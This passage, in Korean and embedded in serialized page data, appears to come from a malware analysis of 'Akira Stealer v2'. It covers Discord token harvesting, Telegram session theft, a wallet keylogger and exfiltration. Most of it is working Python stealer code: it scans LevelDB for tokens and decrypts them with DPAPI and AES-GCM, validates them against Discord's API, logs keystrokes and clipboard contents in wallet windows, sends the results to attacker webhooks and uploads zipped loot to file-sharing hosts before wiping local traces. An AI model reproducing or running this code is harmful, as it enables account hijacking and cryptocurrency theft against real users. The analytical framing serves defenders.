지갑 구성 및 거래 기록.",[633,8114,8115,8118],{},[567,8116,8117],{},"이점",": 공격자가 거래를 승인하는 데 사용할 수 있는 오프라인 지갑 콘텐츠.",[888,8120,8122],{"id":8121},"_783-discord-토큰-수집","7.8.3 Discord 토큰 수집",[526,8124,894],{},[526,8126,8127],{},"Discord 토큰은 인증 아티팩트로, 본질적으로 장기 유효 베어러 토큰이며, 자격 증명이나 MFA 없이도 사용자 계정에 대한 완전한 접근을 부여할 수 있습니다. Akira는 Discord Stable, Canary, PTB(Public Test Build), 심지어 Lightcord 같은 변형 포크를 포함한 다양한 Discord 클라이언트가 저장한 토큰을 찾아 브라우저와 앱 데이터 폴더를 스캔하여 이를 악용합니다.",[526,8129,8130],{},"이 기법은 애플리케이션의 Local Storage 아래 LevelDB 파일을 겨냥합니다. 이곳에는 인증 토큰이 종종 평문으로 남아 있습니다. 정규 표현식을 사용해, 멀웨어는 이 .log 및 .ldb 파일에서 일반 사용자 토큰이나 MFA 활성화 토큰과 일치하는 패턴을 스캔합니다.",[526,8132,8133],{},"신뢰성을 높이고 노이즈를 줄이기 위해, Akira에는 검증 단계가 포함되어 있습니다. 수집한 각 토큰을 사용해 Discord의 /users/@me 엔드포인트에 테스트 요청을 보냅니다. 성공적으로 인증되는(HTTP 200) 토큰만 웹훅을 통해 유출되며, 일반적으로 공격자가 통제하는 Discord 채널로 전송됩니다.",[526,8135,8136],{},"이 방법은 공격자가 실시간으로 Discord 계정을 하이재킹하고, 피해자를 사칭하며, DM과 길드를 긁어오거나, 소셜 엔지니어링을 통해 추가 멀웨어를 배포할 수 있게 합니다. 그것도 로그인 경고를 트리거하지 않고 말입니다.",[615,8138,8140],{"className":4515,"code":8139,"language":4517,"meta":530,"style":530},"import re, requests\npatterns = [\n    r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27,100}\",  # User tokens\n    r\"mfa\\.[\\w-]{84,100}\"                      # MFA tokens\n]\ndef harvest_discord(base, webhook_url):\n    db_dir = os.path.join(base, \"Local Storage\", \"leveldb\")\n    for file in os.listdir(db_dir):\n        if file.endswith(('.log', '.ldb')):\n            for line in open(os.path.join(db_dir, file), errors='ignore'):\n                for pat in patterns:\n                    for token in re.findall(pat, line):\n                        # Verify token\n                        h = {\"Authorization\": token}\n                        r = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=h)\n                        if r.status_code == 200:\n                            uname = r.json()[\"username\"] + \"#\" + r.json()[\"discriminator\"]\n                            payload = {\"content\": f\"**Discord** {uname}: `{token}`\"}\n                            requests.post(webhook_url, json=payload)\n",[578,8141,8142,8147,8152,8157,8162,8166,8171,8176,8181,8186,8191,8196,8201,8206,8211,8216,8221,8226,8231],{"__ignoreMap":530},[1706,8143,8144],{"class":1708,"line":1709},[1706,8145,8146],{},"import re, requests\n",[1706,8148,8149],{"class":1708,"line":531},[1706,8150,8151],{},"patterns = [\n",[1706,8153,8154],{"class":1708,"line":2091},[1706,8155,8156],{},"    r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27,100}\",  # User tokens\n",[1706,8158,8159],{"class":1708,"line":2097},[1706,8160,8161],{},"    r\"mfa\\.[\\w-]{84,100}\"                      # MFA tokens\n",[1706,8163,8164],{"class":1708,"line":2419},[1706,8165,7947],{},[1706,8167,8168],{"class":1708,"line":2425},[1706,8169,8170],{},"def harvest_discord(base, webhook_url):\n",[1706,8172,8173],{"class":1708,"line":3081},[1706,8174,8175],{},"    db_dir = os.path.join(base, \"Local Storage\", \"leveldb\")\n",[1706,8177,8178],{"class":1708,"line":3874},[1706,8179,8180],{},"    for file in os.listdir(db_dir):\n",[1706,8182,8183],{"class":1708,"line":3880},[1706,8184,8185],{},"        if file.endswith(('.log', '.ldb')):\n",[1706,8187,8188],{"class":1708,"line":4129},[1706,8189,8190],{},"            for line in open(os.path.join(db_dir, file), errors='ignore'):\n",[1706,8192,8193],{"class":1708,"line":5054},[1706,8194,8195],{},"                for pat in patterns:\n",[1706,8197,8198],{"class":1708,"line":5060},[1706,8199,8200],{},"                    for token in re.findall(pat, line):\n",[1706,8202,8203],{"class":1708,"line":5066},[1706,8204,8205],{},"                        # Verify token\n",[1706,8207,8208],{"class":1708,"line":5072},[1706,8209,8210],{},"                        h = {\"Authorization\": token}\n",[1706,8212,8213],{"class":1708,"line":5078},[1706,8214,8215],{},"                        r = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=h)\n",[1706,8217,8218],{"class":1708,"line":5084},[1706,8219,8220],{},"                        if r.status_code == 200:\n",[1706,8222,8223],{"class":1708,"line":5090},[1706,8224,8225],{},"                            uname = r.json()[\"username\"] + \"#\" + r.json()[\"discriminator\"]\n",[1706,8227,8228],{"class":1708,"line":5096},[1706,8229,8230],{},"                            payload = {\"content\": f\"**Discord** {uname}: `{token}`\"}\n",[1706,8232,8233],{"class":1708,"line":5102},[1706,8234,8235],{},"                            requests.post(webhook_url, json=payload)\n",[630,8237,8238],{},[633,8239,8240,8243],{},[567,8241,8242],{},"검증",": 유효한 토큰만 게시하여, 만료된 JWT가 전송되는 것을 방지합니다.",[888,8245,8247],{"id":8246},"_784-telegram-세션-파일","7.8.4 Telegram 세션 파일",[526,8249,894],{},[526,8251,8252,8254],{},[567,8253,7871],{}," Telegram Desktop/TData",[615,8256,8258],{"className":4515,"code":8257,"language":4517,"meta":530,"style":530},"def steal_telegram(tdata_path, dest_root):\n    if os.path.exists(tdata_path):\n        Utils.TaskKill(\"telegram.exe\")\n        dest = os.path.join(dest_root, \"Wallets\", \"Telegram\")\n        shutil.copytree(tdata_path, dest, dirs_exist_ok=True)\n        data.has_telegram = True\n",[578,8259,8260,8265,8270,8275,8280,8285],{"__ignoreMap":530},[1706,8261,8262],{"class":1708,"line":1709},[1706,8263,8264],{},"def steal_telegram(tdata_path, dest_root):\n",[1706,8266,8267],{"class":1708,"line":531},[1706,8268,8269],{},"    if os.path.exists(tdata_path):\n",[1706,8271,8272],{"class":1708,"line":2091},[1706,8273,8274],{},"        Utils.TaskKill(\"telegram.exe\")\n",[1706,8276,8277],{"class":1708,"line":2097},[1706,8278,8279],{},"        dest = os.path.join(dest_root, \"Wallets\", \"Telegram\")\n",[1706,8281,8282],{"class":1708,"line":2419},[1706,8283,8284],{},"        shutil.copytree(tdata_path, dest, dirs_exist_ok=True)\n",[1706,8286,8287],{"class":1708,"line":2425},[1706,8288,8289],{},"        data.has_telegram = True\n",[630,8291,8292,8306],{},[633,8293,8294,8297,8298,8301,8302,8305],{},[567,8295,8296],{},"파일",": 세션 키를 담은 ",[578,8299,8300],{},"tdata"," 폴더, secret/unsecret 파일을 담은 ",[578,8303,8304],{},"D877F..."," 폴더.",[633,8307,8308,8311],{},[567,8309,8310],{},"용도",": 공격자의 Telegram 클라이언트에 로드하여 전체 계정에 접근.",[888,8313,8315],{"id":8314},"_785-라이브-지갑-키로깅","7.8.5 라이브 지갑 키로깅",[526,8317,894],{},[526,8319,8320],{},"암호화폐 지갑은 현대 인포스틸러의 최우선 표적입니다. Akira에는 입력 시점에 시드 문구, 개인 키, 암호 같은 지갑 자격 증명을 탈취하도록 특별히 맞춤화된 라이브 키로거가 포함되어 있습니다. 일반 키로거와 달리, 이 키로거는 알려진 지갑 창이 감지될 때만 활성화되어, 노이즈를 극적으로 줄이고 효율을 높입니다.",[526,8322,8323],{},"이 모듈은 활성 창 제목을 모니터링하고 MetaMask, Phantom, Atomic Wallet 등 인기 지갑 앱의 하드코딩된 목록과 비교합니다. 일치하는 창이 포커스되면, 시스템 전역 키보드 훅을 통해 키 입력을 기록하기 시작합니다. 사용자가 Enter를 누르면, 모듈은 즉시 현재 클립보드 내용을 캡처하고(사용자가 지갑 설정이나 로그인 중 비밀을 복사하는 경우가 많다는 점을 이용), 입력된 내용과 클립보드 데이터를 모두 공격자의 웹훅으로 전송합니다. 이 접근은 두 가지 공격 벡터를 결합하기 때문에 매우 효과적입니다:",[630,8325,8326,8329],{},[633,8327,8328],{},"맥락 인식 키로깅. 관련이 있을 때만 민감한 지갑 입력을 캡처합니다.",[633,8330,8331],{},"클립보드 하이재킹. 복사된 복구 문구나 목적지 주소를 붙여넣기 전에 추출합니다.",[526,8333,8334],{},"이 방법들을 결합하면, 공격자는 브라우저 접근이나 파일 유출 없이도 실시간으로 조용히 지갑을 침해할 수 있습니다.",[615,8336,8338],{"className":4515,"code":8337,"language":4517,"meta":530,"style":530},"import keyboard, pyperclip\n\nclass WalletKeylogger:\n    def __init__(self, wallet_titles):\n        self.buf = \"\"\n        keyboard.on_release(self.capture)\n        self.wallet_titles = wallet_titles\n\n    def capture(self, event):\n        title = pygetwindow.getActiveWindow().title\n        if any(w in title for w in self.wallet_titles):\n            if event.name == 'enter':\n                data = f\"Keys:{self.buf}\\nClip:{pyperclip.paste()}\"\n                send_to_webhook(data)\n                self.buf = \"\"\n            else:\n                self.buf += event.name\n",[578,8339,8340,8345,8349,8354,8359,8364,8369,8374,8378,8383,8388,8393,8398,8403,8408,8413,8418],{"__ignoreMap":530},[1706,8341,8342],{"class":1708,"line":1709},[1706,8343,8344],{},"import keyboard, pyperclip\n",[1706,8346,8347],{"class":1708,"line":531},[1706,8348,3871],{"emptyLinePlaceholder":325},[1706,8350,8351],{"class":1708,"line":2091},[1706,8352,8353],{},"class WalletKeylogger:\n",[1706,8355,8356],{"class":1708,"line":2097},[1706,8357,8358],{},"    def __init__(self, wallet_titles):\n",[1706,8360,8361],{"class":1708,"line":2419},[1706,8362,8363],{},"        self.buf = \"\"\n",[1706,8365,8366],{"class":1708,"line":2425},[1706,8367,8368],{},"        keyboard.on_release(self.capture)\n",[1706,8370,8371],{"class":1708,"line":3081},[1706,8372,8373],{},"        self.wallet_titles = wallet_titles\n",[1706,8375,8376],{"class":1708,"line":3874},[1706,8377,3871],{"emptyLinePlaceholder":325},[1706,8379,8380],{"class":1708,"line":3880},[1706,8381,8382],{},"    def capture(self, event):\n",[1706,8384,8385],{"class":1708,"line":4129},[1706,8386,8387],{},"        title = pygetwindow.getActiveWindow().title\n",[1706,8389,8390],{"class":1708,"line":5054},[1706,8391,8392],{},"        if any(w in title for w in self.wallet_titles):\n",[1706,8394,8395],{"class":1708,"line":5060},[1706,8396,8397],{},"            if event.name == 'enter':\n",[1706,8399,8400],{"class":1708,"line":5066},[1706,8401,8402],{},"                data = f\"Keys:{self.buf}\\nClip:{pyperclip.paste()}\"\n",[1706,8404,8405],{"class":1708,"line":5072},[1706,8406,8407],{},"                send_to_webhook(data)\n",[1706,8409,8410],{"class":1708,"line":5078},[1706,8411,8412],{},"                self.buf = \"\"\n",[1706,8414,8415],{"class":1708,"line":5084},[1706,8416,8417],{},"            else:\n",[1706,8419,8420],{"class":1708,"line":5090},[1706,8421,8422],{},"                self.buf += event.name\n",[630,8424,8425,8431],{},[633,8426,8427,8430],{},[567,8428,8429],{},"트리거 목록",": \"MetaMask\", \"Phantom\", \"Atomic Wallet\" 등을 포함한 창 제목.",[633,8432,8433,8436],{},[567,8434,8435],{},"클립보드",": 복사된 시드나 개인 키를 캡처합니다.",[888,8438,8440],{"id":8439},"_786-패키징-및-유출","7.8.6 패키징 및 유출",[526,8442,894],{},[526,8444,8445],{},"브라우저 데이터, 자격 증명, 지갑 정보, 토큰을 수집한 뒤, Akira는 고도로 자동화되고 은밀한 방식으로 전리품을 통합하고 유출하는 작업으로 진행합니다. 이 단계는 감염 체인의 마지막 단계이며, 신뢰성과 최소한의 포렌식 흔적에 최적화되어 있습니다. 먼저 브라우저 덤프, 로그, 키로깅된 지갑 정보를 포함한 수집된 모든 데이터가 ZIP 아카이브로 압축됩니다. 이는 전체 데이터셋이 단일 페이로드로 전송될 수 있도록 보장합니다. 그다음 아카이브는 가용성에 따라 GoFile, File.io, Oshi.at 같은 여러 공개 파일 공유 서비스에 업로드됩니다. 이 플랫폼들은 익명의 임시 호스팅을 제공하며, 기업 방화벽이나 평판 기반 차단을 우회하는 데 자주 사용됩니다. 동시에 구조화된 보고서가 생성되어 Discord 또는 Telegram 웹훅을 통해 공격자에게 전송됩니다. 여기에는 요약 통계(발견된 지갑 수, 유효한 토큰 수, 탈취된 데이터에 대한 직접 링크)가 포함됩니다. 이는 공격자에게 아카이브를 열지 않고도 표적의 가치를 빠르게 개관할 수 있게 합니다.",[526,8447,8448],{},"마지막으로, 멀웨어는 임시 폴더와 아카이브를 디스크에서 삭제하여, 로컬 포렌식 증거를 효과적으로 제거합니다. 방어자가 감염을 발견할 무렵이면 데이터는 이미 사라졌으며, 종종 복구 불가능합니다.",[615,8450,8452],{"className":4515,"code":8451,"language":4517,"meta":530,"style":530},"# 1) ZIP everything (including Wallets folder)\nzip_path = shutil.make_archive(Utils.get_temp_folder(), 'zip', Utils.get_temp_folder())\n# 2) Attempt upload to primary & fallback services\nurl = Webhook.uploadToGofile(zip_path) or Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n# 3) Report summary\nembed = {\n    \"title\": \"💰 Wallet & Token Exfiltration Report\",\n    \"fields\": [\n        {\"name\": \"Extension Wallets\", \"value\": data.ext_wallets_count},\n        {\"name\": \"Desktop Wallets\",   \"value\": data.desktop_wallets_count},\n        {\"name\": \"Discord Tokens\",    \"value\": len(valid_tokens)},\n        {\"name\": \"Telegram Sessions\", \"value\": data.has_telegram},\n        {\"name\": \"Archive Link\",      \"value\": url or \"[upload failed]\"},\n    ]\n}\nWebhook.sendDataTG(Utils.get_temp_folder(), chatId, startup)\n# 4) Cleanup local folder & ZIP\nUtils.clear_client_folder()\n",[578,8453,8454,8459,8464,8469,8474,8479,8484,8489,8494,8499,8504,8509,8514,8519,8524,8528,8533,8538],{"__ignoreMap":530},[1706,8455,8456],{"class":1708,"line":1709},[1706,8457,8458],{},"# 1) ZIP everything (including Wallets folder)\n",[1706,8460,8461],{"class":1708,"line":531},[1706,8462,8463],{},"zip_path = shutil.make_archive(Utils.get_temp_folder(), 'zip', Utils.get_temp_folder())\n",[1706,8465,8466],{"class":1708,"line":2091},[1706,8467,8468],{},"# 2) Attempt upload to primary & fallback services\n",[1706,8470,8471],{"class":1708,"line":2097},[1706,8472,8473],{},"url = Webhook.uploadToGofile(zip_path) or Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n",[1706,8475,8476],{"class":1708,"line":2419},[1706,8477,8478],{},"# 3) Report summary\n",[1706,8480,8481],{"class":1708,"line":2425},[1706,8482,8483],{},"embed = {\n",[1706,8485,8486],{"class":1708,"line":3081},[1706,8487,8488],{},"    \"title\": \"💰 Wallet & Token Exfiltration Report\",\n",[1706,8490,8491],{"class":1708,"line":3874},[1706,8492,8493],{},"    \"fields\": [\n",[1706,8495,8496],{"class":1708,"line":3880},[1706,8497,8498],{},"        {\"name\": \"Extension Wallets\", \"value\": data.ext_wallets_count},\n",[1706,8500,8501],{"class":1708,"line":4129},[1706,8502,8503],{},"        {\"name\": \"Desktop Wallets\",   \"value\": data.desktop_wallets_count},\n",[1706,8505,8506],{"class":1708,"line":5054},[1706,8507,8508],{},"        {\"name\": \"Discord Tokens\",    \"value\": len(valid_tokens)},\n",[1706,8510,8511],{"class":1708,"line":5060},[1706,8512,8513],{},"        {\"name\": \"Telegram Sessions\", \"value\": data.has_telegram},\n",[1706,8515,8516],{"class":1708,"line":5066},[1706,8517,8518],{},"        {\"name\": \"Archive Link\",      \"value\": url or \"[upload failed]\"},\n",[1706,8520,8521],{"class":1708,"line":5072},[1706,8522,8523],{},"    ]\n",[1706,8525,8526],{"class":1708,"line":5078},[1706,8527,2428],{},[1706,8529,8530],{"class":1708,"line":5084},[1706,8531,8532],{},"Webhook.sendDataTG(Utils.get_temp_folder(), chatId, startup)\n",[1706,8534,8535],{"class":1708,"line":5090},[1706,8536,8537],{},"# 4) Cleanup local folder & ZIP\n",[1706,8539,8540],{"class":1708,"line":5096},[1706,8541,7723],{},[740,8543,8545,8546,2040],{"id":8544},"_79-discord-및-telegram-토큰-탈취클래스-discord","7.9. Discord 및 Telegram 토큰 탈취(클래스: ",[578,8547,1344],{},[526,8549,746],{},[526,8551,8552,8553,8555],{},"Akira Stealer v2의 ",[567,8554,1344],{}," 클래스는 Discord 인증 토큰과 Telegram 세션 데이터를 모두 수집하기 위해 고도로 병렬화된 다단계 프로세스를 실행합니다. 아래에서는 각 구성 요소를 정확한 코드 참조와 예시로 해부합니다.",[888,8557,8559],{"id":8558},"_791-초기화-및-경로-열거","7.9.1 초기화 및 경로 열거",[526,8561,894],{},[526,8563,8564],{},"인스턴스화 시, 생성자는 두 개의 대상 경로 집합을 구성합니다:",[615,8566,8568],{"className":4515,"code":8567,"language":4517,"meta":530,"style":530},"# Discord client LevelDB directories\ndiscord_paths = [\n    [f\"{self.ROAMING}/Discord\", \"/Local Storage/leveldb\"],\n    [f\"{self.ROAMING}/Lightcord\", \"/Local Storage/leveldb\"],\n    ...\n]\n\n# Chromium-based browser LevelDB directories\nbrowserPaths = [\n    [f\"{self.ROAMING}/Opera Software/Opera GX Stable\", \"opera.exe\", \"/Local Storage/leveldb\", ...],\n    [f\"{self.LOCAL}/Google/Chrome/User Data\", \"chrome.exe\", \"/Default/Local Storage/leveldb\", ...],\n    ...\n]\n",[578,8569,8570,8575,8580,8585,8590,8594,8598,8602,8607,8612,8617,8622,8626],{"__ignoreMap":530},[1706,8571,8572],{"class":1708,"line":1709},[1706,8573,8574],{},"# Discord client LevelDB directories\n",[1706,8576,8577],{"class":1708,"line":531},[1706,8578,8579],{},"discord_paths = [\n",[1706,8581,8582],{"class":1708,"line":2091},[1706,8583,8584],{},"    [f\"{self.ROAMING}/Discord\", \"/Local Storage/leveldb\"],\n",[1706,8586,8587],{"class":1708,"line":2097},[1706,8588,8589],{},"    [f\"{self.ROAMING}/Lightcord\", \"/Local Storage/leveldb\"],\n",[1706,8591,8592],{"class":1708,"line":2419},[1706,8593,3861],{},[1706,8595,8596],{"class":1708,"line":2425},[1706,8597,7947],{},[1706,8599,8600],{"class":1708,"line":3081},[1706,8601,3871],{"emptyLinePlaceholder":325},[1706,8603,8604],{"class":1708,"line":3874},[1706,8605,8606],{},"# Chromium-based browser LevelDB directories\n",[1706,8608,8609],{"class":1708,"line":3880},[1706,8610,8611],{},"browserPaths = [\n",[1706,8613,8614],{"class":1708,"line":4129},[1706,8615,8616],{},"    [f\"{self.ROAMING}/Opera Software/Opera GX Stable\", \"opera.exe\", \"/Local Storage/leveldb\", ...],\n",[1706,8618,8619],{"class":1708,"line":5054},[1706,8620,8621],{},"    [f\"{self.LOCAL}/Google/Chrome/User Data\", \"chrome.exe\", \"/Default/Local Storage/leveldb\", ...],\n",[1706,8623,8624],{"class":1708,"line":5060},[1706,8625,3861],{},[1706,8627,8628],{"class":1708,"line":5066},[1706,8629,7947],{},[630,8631,8632,8641],{},[633,8633,8634,1565,8637,8640],{},[567,8635,8636],{},"Discord 경로",[578,8638,8639],{},"%APPDATA%"," 아래의 공식 및 비공식 Discord 클라이언트를 겨냥합니다.",[633,8642,8643,8646],{},[567,8644,8645],{},"브라우저 경로","는 로컬 저장소와 확장을 위한 하위 폴더를 포함해 인기 브라우저의 사용자 데이터 폴더를 다룹니다.",[526,8648,8649],{},"각 항목에 대해 스레드가 생성됩니다:",[615,8651,8653],{"className":4515,"code":8652,"language":4517,"meta":530,"style":530},"for patt in browserPaths:\n    t = Thread(target=self.get_btoken, args=[patt[0], patt[2]])\n    t.start()\nfor patt in discord_paths:\n    t = Thread(target=self.get_discord, args=[patt[0], patt[1]])\n    t.start()\n",[578,8654,8655,8660,8665,8670,8675,8680],{"__ignoreMap":530},[1706,8656,8657],{"class":1708,"line":1709},[1706,8658,8659],{},"for patt in browserPaths:\n",[1706,8661,8662],{"class":1708,"line":531},[1706,8663,8664],{},"    t = Thread(target=self.get_btoken, args=[patt[0], patt[2]])\n",[1706,8666,8667],{"class":1708,"line":2091},[1706,8668,8669],{},"    t.start()\n",[1706,8671,8672],{"class":1708,"line":2097},[1706,8673,8674],{},"for patt in discord_paths:\n",[1706,8676,8677],{"class":1708,"line":2419},[1706,8678,8679],{},"    t = Thread(target=self.get_discord, args=[patt[0], patt[1]])\n",[1706,8681,8682],{"class":1708,"line":2425},[1706,8683,8669],{},[526,8685,8686],{},"이 스레딩 모델은 I/O 처리량을 극대화하여, 수십 개의 디렉터리를 동시에 탐침합니다.",[888,8688,8690],{"id":8689},"_792-토큰-추출-로직","7.9.2 토큰 추출 로직",[526,8692,894],{},[526,8694,8695],{},[567,8696,8697],{},"브라우저에서 평문 토큰 긁어오기",[526,8699,8700,8703,8704,2705,8707,8710],{},[578,8701,8702],{},"get_btoken(path, arg)","는 각 LevelDB 폴더로 이동하여 ",[578,8705,8706],{},".log",[578,8708,8709],{},".ldb"," 파일을 검사합니다:",[615,8712,8714],{"className":4515,"code":8713,"language":4517,"meta":530,"style":530},"for file in os.listdir(path + arg):\n    if file.endswith((\".log\", \".ldb\")):\n        for line in open(f\"{path}{arg}/{file}\", errors=\"ignore\"):\n            for regex in (r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}\", r\"mfa\\.[\\w-]{80,95}\"):\n                tokens = re.findall(regex, line)\n                for token in tokens:\n                    self.tokens.append(token)\n                    self.cehckToken(token)\n",[578,8715,8716,8721,8726,8731,8736,8741,8746,8751],{"__ignoreMap":530},[1706,8717,8718],{"class":1708,"line":1709},[1706,8719,8720],{},"for file in os.listdir(path + arg):\n",[1706,8722,8723],{"class":1708,"line":531},[1706,8724,8725],{},"    if file.endswith((\".log\", \".ldb\")):\n",[1706,8727,8728],{"class":1708,"line":2091},[1706,8729,8730],{},"        for line in open(f\"{path}{arg}/{file}\", errors=\"ignore\"):\n",[1706,8732,8733],{"class":1708,"line":2097},[1706,8734,8735],{},"            for regex in (r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}\", r\"mfa\\.[\\w-]{80,95}\"):\n",[1706,8737,8738],{"class":1708,"line":2419},[1706,8739,8740],{},"                tokens = re.findall(regex, line)\n",[1706,8742,8743],{"class":1708,"line":2425},[1706,8744,8745],{},"                for token in tokens:\n",[1706,8747,8748],{"class":1708,"line":3081},[1706,8749,8750],{},"                    self.tokens.append(token)\n",[1706,8752,8753],{"class":1708,"line":3874},[1706,8754,8755],{},"                    self.cehckToken(token)\n",[630,8757,8758,8767,8775],{},[633,8759,8760,8766],{},[567,8761,8762,8763],{},"정규식 ",[578,8764,8765],{},"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}"," 는 표준 Discord 토큰과 일치합니다.",[633,8768,8769,8774],{},[567,8770,8762,8771],{},[578,8772,8773],{},"mfa\\.[\\w-]{80,95}"," 는 MFA 토큰을 캡처합니다.",[633,8776,8777,8778,8781],{},"중복 제거는 암묵적입니다. 토큰은 검증 전에 ",[578,8779,8780],{},"self.tokens","에 저장됩니다.",[526,8783,8784],{},[567,8785,8786],{},"Discord 클라이언트에서 암호화된 토큰 복호화",[526,8788,8789,8790,8792,8793,8795,8796,8799],{},"Discord 클라이언트는 ",[578,8791,6521],{}," 또는 ",[578,8794,6525],{},"로 시작하는 DPAPI 아래에서 Local Storage 항목을 암호화합니다. ",[578,8797,8798],{},"get_discord(path, arg)","가 이를 처리합니다:",[615,8801,8803],{"className":4515,"code":8802,"language":4517,"meta":530,"style":530},"# Read Local State to obtain encrypted master key\nwith open(path + \"/Local State\", 'r') as f:\n    local_state = json.load(f)\nencrypted_key = b64decode(local_state['os_crypt']['encrypted_key'])[5:]\nmaster_key = self.CryptUnprotectData(encrypted_key)\n\n# Iterate LevelDB files for Base64 payloads\nfor file in os.listdir(path + arg):\n    if file.endswith((\".log\", \".ldb\")):\n        for line in open(f\"{path}{arg}/{file}\"):\n            for token_part in re.findall(r\"dQw4w9WgXcQ:([A-Za-z0-9+/=]+)\", line):\n                ciphertext = b64decode(token_part)\n                token = self.decrypt_value(ciphertext, master_key)\n                self.tokens.append(token)\n                self.cehckToken(token)\n",[578,8804,8805,8810,8815,8819,8824,8829,8833,8838,8842,8846,8851,8856,8861,8866,8871],{"__ignoreMap":530},[1706,8806,8807],{"class":1708,"line":1709},[1706,8808,8809],{},"# Read Local State to obtain encrypted master key\n",[1706,8811,8812],{"class":1708,"line":531},[1706,8813,8814],{},"with open(path + \"/Local State\", 'r') as f:\n",[1706,8816,8817],{"class":1708,"line":2091},[1706,8818,7123],{},[1706,8820,8821],{"class":1708,"line":2097},[1706,8822,8823],{},"encrypted_key = b64decode(local_state['os_crypt']['encrypted_key'])[5:]\n",[1706,8825,8826],{"class":1708,"line":2419},[1706,8827,8828],{},"master_key = self.CryptUnprotectData(encrypted_key)\n",[1706,8830,8831],{"class":1708,"line":2425},[1706,8832,3871],{"emptyLinePlaceholder":325},[1706,8834,8835],{"class":1708,"line":3081},[1706,8836,8837],{},"# Iterate LevelDB files for Base64 payloads\n",[1706,8839,8840],{"class":1708,"line":3874},[1706,8841,8720],{},[1706,8843,8844],{"class":1708,"line":3880},[1706,8845,8725],{},[1706,8847,8848],{"class":1708,"line":4129},[1706,8849,8850],{},"        for line in open(f\"{path}{arg}/{file}\"):\n",[1706,8852,8853],{"class":1708,"line":5054},[1706,8854,8855],{},"            for token_part in re.findall(r\"dQw4w9WgXcQ:([A-Za-z0-9+/=]+)\", line):\n",[1706,8857,8858],{"class":1708,"line":5060},[1706,8859,8860],{},"                ciphertext = b64decode(token_part)\n",[1706,8862,8863],{"class":1708,"line":5066},[1706,8864,8865],{},"                token = self.decrypt_value(ciphertext, master_key)\n",[1706,8867,8868],{"class":1708,"line":5072},[1706,8869,8870],{},"                self.tokens.append(token)\n",[1706,8872,8873],{"class":1708,"line":5078},[1706,8874,8875],{},"                self.cehckToken(token)\n",[630,8877,8878,8887],{},[633,8879,8880,8883,8884,8886],{},[567,8881,8882],{},"마스터 키 복구",": 5바이트 DPAPI 헤더를 제거한 뒤, ",[578,8885,7190],{},"(Windows DPAPI를 감쌈)를 호출하여 AES-GCM 키를 복호화합니다.",[633,8888,8889,8892,8893,8896,8897,8900,8901],{},[567,8890,8891],{},"페이로드 파싱",": 토큰은 ",[578,8894,8895],{},"dQw4w9WgXcQ:","(공격자가 선택한 마커)로 접두됩니다. Base64 디코딩 후, ",[578,8898,8899],{},"decrypt_value()","가 IV와 암호문을 분리합니다:",[615,8902,8904],{"className":4515,"code":8903,"language":4517,"meta":530,"style":530},"def decrypt\\_value(buff, master\\_key):\niv = buff\\[3:15]\npayload = buff\\[15:]\ncipher = AES.new(master\\_key, AES.MODE\\_GCM, iv)\nreturn cipher.decrypt(payload)\\[:-16].decode()\n",[578,8905,8906,8911,8916,8921,8926],{"__ignoreMap":530},[1706,8907,8908],{"class":1708,"line":1709},[1706,8909,8910],{},"def decrypt\\_value(buff, master\\_key):\n",[1706,8912,8913],{"class":1708,"line":531},[1706,8914,8915],{},"iv = buff\\[3:15]\n",[1706,8917,8918],{"class":1708,"line":2091},[1706,8919,8920],{},"payload = buff\\[15:]\n",[1706,8922,8923],{"class":1708,"line":2097},[1706,8924,8925],{},"cipher = AES.new(master\\_key, AES.MODE\\_GCM, iv)\n",[1706,8927,8928],{"class":1708,"line":2419},[1706,8929,8930],{},"return cipher.decrypt(payload)\\[:-16].decode()\n",[888,8932,8934],{"id":8933},"_793-토큰-검증-및-유출","7.9.3 토큰 검증 및 유출",[526,8936,894],{},[526,8938,8939],{},"추출된 각 토큰은 라이브 API 호출을 통해 검증됩니다:",[615,8941,8944],{"className":8942,"code":8943,"language":620},[618],"headers = {\"Authorization\": token}\nresp = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=headers)\nif resp.status_code == 200:\n    self.cehckToken(token)\n",[578,8945,8943],{"__ignoreMap":530},[630,8947,8948],{},[633,8949,8950,646,8953,8956,8957,8960,8961],{},[567,8951,8952],{},"성공 시",[578,8954,8955],{},"cehckToken()","은 Telegram(",[578,8958,8959],{},"useTg=True",")을 통해 전송할지 Discord 웹훅을 통해 전송할지 결정합니다:",[615,8962,8964],{"className":4515,"code":8963,"language":4517,"meta":530,"style":530},"if useTg:\nself.sendTokenTg(token)\nelse:\nself.send\\_embed(token)\n",[578,8965,8966,8971,8976,8981],{"__ignoreMap":530},[1706,8967,8968],{"class":1708,"line":1709},[1706,8969,8970],{},"if useTg:\n",[1706,8972,8973],{"class":1708,"line":531},[1706,8974,8975],{},"self.sendTokenTg(token)\n",[1706,8977,8978],{"class":1708,"line":2091},[1706,8979,8980],{},"else:\n",[1706,8982,8983],{"class":1708,"line":2097},[1706,8984,8985],{},"self.send\\_embed(token)\n",[630,8987,8988],{},[633,8989,8990,8995],{},[567,8991,8992],{},[578,8993,8994],{},"send_embed"," 는 다음 필드를 사용해 사용자 메타데이터(사용자명, 디스크리미네이터, 이메일, Nitro 상태, 결제 정보)를 담은 풍부한 Discord 임베드를 만듭니다",[615,8997,9000],{"className":8998,"code":8999,"language":620},[618],"user_json = requests.get(...).json()\nusername = user_json[\"username\"]\nid = user_json[\"id\"]\n# embed fields: token, email, phone, IP, flags, Nitro, billing\n",[578,9001,8999],{"__ignoreMap":530},[630,9003,9004],{},[633,9005,9006,9011],{},[567,9007,9008],{},[578,9009,9010],{},"sendTokenTg"," 는 Telegram API를 통해 평문 요약을 전송합니다.",[888,9013,9015],{"id":9014},"_794-telegram-세션-수집","7.9.4 Telegram 세션 수집",[526,9017,894],{},[526,9019,9020],{},"Discord 토큰 외에도, 스틸러는 Telegram Desktop 세션을 탈취합니다:",[615,9022,9024],{"className":4515,"code":9023,"language":4517,"meta":530,"style":530},"@staticmethod\ndef steal_telegram():\n    src = f\"{os.getenv('APPDATA')}/Telegram Desktop/tdata\"\n    Utils.TaskKill(\"telegram.exe\")\n    shutil.copytree(src, 